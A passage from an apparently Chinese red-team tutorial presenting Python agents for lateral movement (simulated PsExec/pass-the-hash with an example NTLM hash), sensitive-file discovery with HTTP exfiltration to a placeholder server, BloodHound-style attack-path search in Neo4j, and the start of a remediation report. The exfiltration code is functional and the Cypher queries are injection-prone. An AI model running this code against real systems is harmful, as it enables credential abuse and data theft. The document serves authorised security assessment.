        # psexec.run(target_ip)

        if password or ntlm_hash:
            print(f"    [+] PsExec simulated success to {target_ip} for user {username}. (Requires actual Impacket integration)")
            self.potential_lateral_paths.append({
                'type': 'PsExec (Remote Command Execution)',
                'source_host': self.current_host_ip,
                'target_host': target_ip,
                'credential': username,
                'description': f"Achieved remote command execution on {target_ip} using PsExec."
            })
        else:
            print(f"    [-] PsExec simulated failure to {target_ip} for user {username}. (No valid credentials)")

    def run(self, network_segment):
        self.scan_for_reachable_hosts(network_segment)

        if not self.compromised_credentials:
            print("[-] No compromised credentials available for lateral movement attempts.")
            return

        username = self.compromised_credentials.get('username')
        password = self.compromised_credentials.get('password')
        ntlm_hash = self.compromised_credentials.get('ntlm_hash')

        if not username:
            print("[-] No username provided in compromised credentials.")
            return

        for target_ip in self.discovered_reachable_hosts:
            if ntlm_hash:
                self.attempt_pth_smb(target_ip, username, ntlm_hash)
                self.attempt_psexec(target_ip, username, ntlm_hash=ntlm_hash) # PsExec also supports hashes
            elif password:
                self.attempt_psexec(target_ip, username, password=password)
            else:
                print(f"    [-] No suitable credentials (password or NTLM hash) for user {username} to attempt lateral movement.")

        print("n--- Lateral Movement Scan Summary ---")
        if self.potential_lateral_paths:
            for path in self.potential_lateral_paths:
                print(f"  - Type: {path['type']}")
                print(f"    Source: {path['source_host']}")
                print(f"    Target: {path['target_host']}")
                print(f"    Credential: {path['credential']}")
                print(f"    Description: {path['description']}")
        else:
            print("  No lateral movement paths found or successfully exploited.")
        print("-----------------------------------")

if __name__ == "__main__":
    # 假设Agent在192.168.1.10上,并获得了administrator的NTLM哈希
    # 实际应用中,NTLM哈希会通过Mimikatz或其他工具从内存中dump出。
    compromised_creds = {
        'username': 'Administrator',
        'ntlm_hash': 'AAD3B435B51404EEAAD3B435B51404EE:4C71CF036ED39E13134375AD79B2222D' # Example hash
        # 'password': 'AdminPassword123!' # Or a plaintext password
    }
    lateral_agent = LateralMovementAgent("192.168.1.10", compromised_creds)
    # 假设内网段是192.168.1.0/24
    lateral_agent.run("192.168.1.0/24")

说明:

  • 此示例展示了如何利用 Impacket 库进行 Pass-the-Hash 攻击。
  • Agent 会遍历已发现的可达主机,并尝试使用已窃取的凭据进行认证。
  • 成功认证后,Agent 可以进一步执行命令、上传文件,或部署新的持久化机制。

5. 数据窃取/影响 (Data Exfiltration/Impact)

这是攻击的最终目标阶段,根据红队演练的目标,可能是窃取敏感数据、破坏系统功能或实现业务中断。

Agent 策略:

  • 识别敏感数据: 扫描文件系统、数据库,查找信用卡号、社保号、知识产权文档等。
  • 模拟数据传输: 将发现的敏感数据通过隐蔽通道(如 DNS 隧道、HTTP/S 隧道)传输到外部服务器。
  • 服务中断: 模拟关闭关键服务、删除重要文件等操作,评估业务影响。

代码示例:Python 模拟敏感文件查找与数据外传 (HTTP GET)

import os
import requests
import re

class DataExfiltrationAgent:
    def __init__(self, target_host_ip, exfil_server_url):
        self.target_host_ip = target_host_ip
        self.exfil_server_url = exfil_server_url
        self.sensitive_files = []
        self.exfiltrated_data = []

    def find_sensitive_files(self, search_paths=["/etc", "/var/www", "/home"], keywords=["password", "confidential", "secret", "private key", "database"]):
        """
        在目标主机上查找包含敏感关键字的文件。
        这部分代码在受控主机上执行。
        """
        print(f"[*] Searching for sensitive files on {self.target_host_ip}...")
        for path in search_paths:
            if not os.path.exists(path):
                # print(f"    [-] Path {path} does not exist on target.")
                continue
            for root, _, files in os.walk(path):
                for file_name in files:
                    file_path = os.path.join(root, file_name)
                    try:
                        # 限制文件大小以避免读取大文件
                        if os.path.getsize(file_path) > 1024 * 1024 * 5: # 5MB limit
                            continue
                        with open(file_path, 'r', errors='ignore') as f:
                            content = f.read(4096) # Read first 4KB for keywords
                            for keyword in keywords:
                                if keyword.lower() in content.lower():
                                    print(f"    [!] Found sensitive file: {file_path} (keyword: {keyword})")
                                    self.sensitive_files.append({
                                        'path': file_path,
                                        'reason': f"Contains keyword '{keyword}'"
                                    })
                                    break # Move to next file if one keyword is found
                    except Exception as e:
                        # print(f"    [-] Error reading {file_path}: {e}")
                        pass
        print(f"    [+] Found {len(self.sensitive_files)} potential sensitive files.")

    def exfiltrate_data_http_get(self, data_content, filename="data.txt"):
        """
        通过HTTP GET请求模拟数据外传。
        实际数据会编码或分块传输。
        """
        print(f"[*] Attempting to exfiltrate data (HTTP GET) to {self.exfil_server_url}...")
        try:
            # Base64 encode the data to handle special characters and keep it in one line
            import base64
            encoded_data = base64.b64encode(data_content.encode('utf-8')).decode('utf-8')

            # Simulate sending data as a query parameter
            exfil_url = f"{self.exfil_server_url}?filename={filename}&data={encoded_data[:200]}" # Limit data for GET
            response = requests.get(exfil_url, timeout=10)
            response.raise_for_status()
            print(f"    [+] Data (first 200 chars) exfiltrated successfully via HTTP GET for {filename}.")
            self.exfiltrated_data.append({
                'filename': filename,
                'method': 'HTTP GET',
                'status': 'Success',
                'exfil_url': exfil_url
            })
        except requests.exceptions.RequestException as e:
            print(f"    [-] Failed to exfiltrate data via HTTP GET for {filename}: {e}")
            self.exfiltrated_data.append({
                'filename': filename,
                'method': 'HTTP GET',
                'status': 'Failed',
                'error': str(e)
            })
        except Exception as e:
            print(f"    [-] An unexpected error occurred during exfiltration: {e}")

    def run(self):
        self.find_sensitive_files()

        if not self.sensitive_files:
            print("[-] No sensitive files found to exfiltrate.")
            return

        for file_info in self.sensitive_files:
            file_path = file_info['path']
            try:
                with open(file_path, 'r', errors='ignore') as f:
                    content = f.read() # Read full content for exfiltration attempt
                    # In a real scenario, we'd split large files, encrypt, etc.
                    self.exfiltrate_data_http_get(content, os.path.basename(file_path))
            except Exception as e:
                print(f"    [-] Failed to read content of {file_path} for exfiltration: {e}")

        print("n--- Data Exfiltration Summary ---")
        if self.exfiltrated_data:
            for item in self.exfiltrated_data:
                print(f"  - File: {item['filename']}")
                print(f"    Method: {item['method']}")
                print(f"    Status: {item['status']}")
                if 'error' in item:
                    print(f"    Error: {item['error']}")
        else:
            print("  No data was exfiltrated.")
        print("-------------------------------")

if __name__ == "__main__":
    # 假设Agent在某个Linux主机上运行,并有一个外部接收数据的服务器
    # 实际中 exfil_server_url 是红队控制的服务器
    exfil_agent = DataExfiltrationAgent("192.168.1.10", "http://your.exfil.server.com/receive_data")

    # 为了演示,创建一个模拟的敏感文件
    if not os.path.exists("/tmp/test_sensitive_data"):
        os.makedirs("/tmp/test_sensitive_data")
    with open("/tmp/test_sensitive_data/passwords.txt", "w") as f:
        f.write("User: admin, Password: SuperSecretPassword123!n")
        f.write("Confidential project report.n")
    with open("/tmp/test_sensitive_data/project_plan.doc", "w") as f:
        f.write("This is a confidential project plan document.n")

    exfil_agent.run()

    # 清理模拟文件
    # os.remove("/tmp/test_sensitive_data/passwords.txt")
    # os.remove("/tmp/test_sensitive_data/project_plan.doc")
    # os.rmdir("/tmp/test_sensitive_data")

说明:

  • Agent 会在目标文件系统中搜索包含特定关键字的文件。
  • 通过 HTTP GET 请求,将数据编码后作为 URL 参数发送到外部服务器,模拟数据外传。
  • 更高级的 Agent 会使用 DNS 隧道、ICMP 隧道等隐蔽通道,并对数据进行加密和分块传输。

自动化攻击路径生成与分析

这是红队 Agent 的核心智能所在。它不仅仅是执行单个攻击步骤,而是将所有侦察到的信息、发现的漏洞和成功执行的攻击链接起来,形成一个完整的攻击图(Attack Graph)。

实现方式:

  1. 数据模型: 将主机、用户、服务、漏洞、凭据等视为图的节点(Node),将它们之间的关系(如“主机 A 运行服务 B”、“用户 C 拥有主机 D 的权限”、“漏洞 E 存在于服务 F 上”)视为图的边(Edge)。
  2. 图数据库: 使用 Neo4j 这样的图数据库存储这些节点和边。BloodHound 就是一个很好的例子,它将 Active Directory 的复杂关系可视化。Agent 可以将收集到的数据导入 Neo4j。
  3. 路径搜索算法: 利用图算法(如 Dijkstra、A*)在攻击图中搜索从初始立足点(如外网 Web 服务器)到最终目标(如域控制器、敏感数据服务器)的最短或最有效的攻击路径。
  4. 风险评估: 对每个攻击路径上的漏洞和步骤进行风险评分,综合评估路径的难度和潜在影响。

代码示例:Python 与 Neo4j/BloodHound 数据模型 (概念性)

假设我们已经收集了主机、用户、组、漏洞等信息,并将其转换为 BloodHound 可识别的 JSON 格式或直接导入 Neo4j。

from neo4j import GraphDatabase
import json

class AttackPathAnalyzer:
    def __init__(self, neo4j_uri, neo4j_user, neo4j_password):
        self.driver = GraphDatabase.driver(neo4j_uri, auth=(neo4j_user, neo4j_password))

    def close(self):
        self.driver.close()

    def import_bloodhound_data(self, json_file_path):
        """
        模拟导入BloodHound收集到的数据到Neo4j。
        实际BloodHound有自己的数据导入工具,这里演示其概念。
        """
        print(f"[*] Importing BloodHound-like data from {json_file_path} into Neo4j...")
        with open(json_file_path, 'r') as f:
            data = json.load(f)

        # 简化:只导入用户和组,并创建简单的关系
        with self.driver.session() as session:
            for user in data.get('users', []):
                session.run(f"MERGE (u:User {{name: '{user['name']}', sid: '{user['sid']}'}})")
            for group in data.get('groups', []):
                session.run(f"MERGE (g:Group {{name: '{group['name']}', sid: '{group['sid']}'}})")
            for user_in_group in data.get('useringroup', []):
                session.run(f"""
                    MATCH (u:User {{sid: '{user_in_group['membersid']}'}})
                    MATCH (g:Group {{sid: '{user_in_group['groupsid']}'}})
                    MERGE (u)-[:MEMBER_OF]->(g)
                """)
            print(f"    [+] Imported {len(data.get('users', []))} users and {len(data.get('groups', []))} groups.")

            # 导入机器和漏洞信息 (概念性)
            for host_info in data.get('hosts', []):
                session.run(f"MERGE (h:Host {{ip: '{host_info['ip']}', os: '{host_info['os']}'}})")
                for port in host_info.get('ports', []):
                    session.run(f"""
                        MATCH (h:Host {{ip: '{host_info['ip']}'}})
                        MERGE (p:Port {{port_id: {port['port_id']}, service_name: '{port['service_name']}'}})
                        MERGE (h)-[:HAS_OPEN_PORT]->(p)
                    """)
                    if port.get('vulnerabilities'):
                        for vuln in port['vulnerabilities']:
                            session.run(f"""
                                MATCH (p:Port {{port_id: {port['port_id']}, service_name: '{port['service_name']}'}})
                                MERGE (v:Vulnerability {{name: '{vuln['name']}', cve: '{vuln['cve']}'}})
                                MERGE (p)-[:HAS_VULNERABILITY]->(v)
                            """)
            print(f"    [+] Imported host and vulnerability information.")

    def find_attack_paths(self, start_node_type, start_node_property, start_node_value, end_node_type, end_node_property, end_node_value, max_depth=10):
        """
        在Neo4j中查找攻击路径。
        这是一个简化版的路径查询,实际会更复杂。
        """
        print(f"n[*] Searching for attack paths from {start_node_type} ({start_node_property}={start_node_value}) to {end_node_type} ({end_node_property}={end_node_value})...")
        query = f"""
        MATCH (start:{start_node_type} {{{start_node_property}: '{start_node_value}'}}),
              (end:{end_node_type} {{{end_node_property}: '{end_node_value}'}})
        CALL apoc.algo.allSimplePaths(start, end, 'MEMBER_OF|HAS_OPEN_PORT|HAS_VULNERABILITY|RUNS_SERVICE|OWNS|CAN_RDP|CAN_SMB', {max_depth}) YIELD path
        RETURN path LIMIT 5
        """
        # apoc.algo.allSimplePaths is a powerful APOC procedure for pathfinding.
        # It needs to be installed in Neo4j.
        # For a basic setup, we can use simple MATCH queries.

        # Simplified query without APOC, finding paths between two nodes
        simple_query = f"""
        MATCH p = shortestPath(
            (startNode:{start_node_type} {{{start_node_property}: '{start_node_value}'}})-[*1..{max_depth}]->(endNode:{end_node_type} {{{end_node_property}: '{end_node_value}'}})
        )
        RETURN p LIMIT 5
        """

        paths_found = []
        with self.driver.session() as session:
            try:
                result = session.run(simple_query)
                for record in result:
                    path_nodes = []
                    path_edges = []
                    path = record["p"]

                    # Extract nodes
                    for node in path.nodes:
                        path_nodes.append(dict(node.items()))

                    # Extract relationships (edges)
                    for rel in path.relationships:
                        path_edges.append({
                            'start': dict(rel.start_node.items()),
                            'type': rel.type,
                            'end': dict(rel.end_node.items())
                        })
                    paths_found.append({'nodes': path_nodes, 'edges': path_edges})

                if paths_found:
                    print(f"    [+] Found {len(paths_found)} potential attack paths.")
                    for i, p in enumerate(paths_found):
                        print(f"n    --- Path {i+1} ---")
                        # Print nodes in order
                        for j, node in enumerate(p['nodes']):
                            label_str = ":".join(node.labels)
                            props = ", ".join([f"{k}:'{v}'" for k,v in node.items() if k != 'name' and k != 'sid' and k != 'ip'])
                            main_id = node.get('name') or node.get('ip') or node.get('sid') or f"Node-{j}"
                            print(f"      {j}. ({label_str}) {main_id} ({props})")

                        # Print relationships between them for clarity
                        for k, edge in enumerate(p['edges']):
                            start_id = edge['start'].get('name') or edge['start'].get('ip') or edge['start'].get('sid')
                            end_id = edge['end'].get('name') or edge['end'].get('ip') or edge['end'].get('sid')
                            print(f"      -> {edge['type']} -> ")

                else:
                    print("    [-] No attack paths found for the specified criteria.")
            except Exception as e:
                print(f"    [-] Error finding paths: {e}")
        return paths_found

if __name__ == "__main__":
    # 假设Neo4j服务正在本地运行,并使用默认凭据
    # 注意: 需要安装Neo4j数据库并启动
    # pip install neo4j
    neo4j_uri = "bolt://localhost:7687"
    neo4j_user = "neo4j"
    neo4j_password = "password" # 替换为你的Neo4j密码

    path_analyzer = AttackPathAnalyzer(neo4j_uri, neo4j_user, neo4j_password)

    # 1. 准备模拟的BloodHound数据文件
    # 实际会从BloodHound.py或Agent的侦察模块生成
    mock_bloodhound_data = {
        "users": [
            {"name": "[email protected]", "sid": "S-1-5-21-XXX-500"},
            {"name": "Domain [email protected]", "sid": "S-1-5-21-YYY-500"}
        ],
        "groups": [
            {"name": "Domain [email protected]", "sid": "S-1-5-21-YYY-512"}
        ],
        "useringroup": [
            {"membersid": "S-1-5-21-YYY-500", "groupsid": "S-1-5-21-YYY-512"}
        ],
        "hosts": [
            {"ip": "192.168.1.10", "os": "Windows Server 2016", "ports": [
                {"port_id": 80, "service_name": "http", "vulnerabilities": [{"name": "SQLi", "cve": "CVE-2023-XXXX"}]},
                {"port_id": 445, "service_name": "smb"}
            ]},
            {"ip": "192.168.1.20", "os": "Windows Server 2019 (DC)", "ports": [
                {"port_id": 389, "service_name": "ldap"},
                {"port_id": 445, "service_name": "smb"}
            ]}
        ]
    }
    with open("mock_bloodhound_data.json", "w") as f:
        json.dump(mock_bloodhound_data, f, indent=2)

    # 2. 导入数据
    path_analyzer.import_bloodhound_data("mock_bloodhound_data.json")

    # 3. 查找攻击路径
    # 目标:从一个存在SQL注入的Web服务器 (192.168.1.10) 到域控制器 (192.168.1.20)
    # 实际路径会更复杂,包含用户凭据、权限提升等多个步骤
    path_analyzer.find_attack_paths(
        start_node_type="Host", start_node_property="ip", start_node_value="192.168.1.10",
        end_node_type="Host", end_node_property="ip", end_node_value="192.168.1.20"
    )

    # 查找从一个普通用户到域管理员的路径
    path_analyzer.find_attack_paths(
        start_node_type="User", start_node_property="name", start_node_value="[email protected]",
        end_node_type="User", end_node_property="name", end_node_value="Domain [email protected]"
    )

    path_analyzer.close()

说明:

  • Agent 首先将收集到的网络资产、用户、组、服务、漏洞等信息,按照图数据库的节点和边模型进行结构化。
  • 通过 Neo4j 的 Cypher 查询语言,Agent 可以执行复杂的路径查找,例如查找从“任意暴露在互联网上的 Web 服务”到“包含敏感数据的数据库服务器”的最短路径。
  • shortestPath 函数是 Cypher 中用于查找最短路径的内置函数。
  • 攻击路径的“边”代表着攻击者可以从一个节点移动到另一个节点的行动,例如“通过漏洞利用”、“使用凭据登录”、“提升权限”等。

漏洞修复建议生成

发现攻击路径并识别出关键漏洞后,Agent 的下一个重要任务是生成清晰、可操作的修复建议。

实现方式:

  1. 漏洞分类与优先级: 根据漏洞的类型(如 Web 漏洞、配置错误、凭据问题)、CVSS 评分、对攻击路径的影响程度等,对漏洞进行分类和优先级排序。
  2. 具体修复措施: 为每个漏洞提供详细的修复步骤和最佳实践。
  3. 影响分析: 说明修复该漏洞将如何中断或阻止攻击路径。
  4. 报告生成: 将所有信息整合为结构化报告(如 JSON、Markdown、PDF),方便安全团队和管理层查阅。

代码示例:Python 生成结构化修复建议报告


import json
import datetime

class RemediationSuggester:
    def __init__(self, discovered_vulnerabilities, attack_paths):
        self.vulnerabilities = discovered_vulnerabilities # List of dicts, e.g., from WebVulnerabilityScanner, Nmap parsing
        self.attack_paths = attack_paths # List of dicts, from AttackPathAnalyzer
        self.remediation_suggestions = []

    def analyze_and_prioritize_vulnerabilities(self):
        """
        分析漏洞,给出优先级和初步建议。
        """
        print("[*] Analyzing vulnerabilities and prioritizing remediation...")
        for vuln in self.vulnerabilities:
            suggestion = {
                'vulnerability_type': vuln.get('type', 'Unknown'),
                'asset': vuln.get('url') or vuln.get('

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注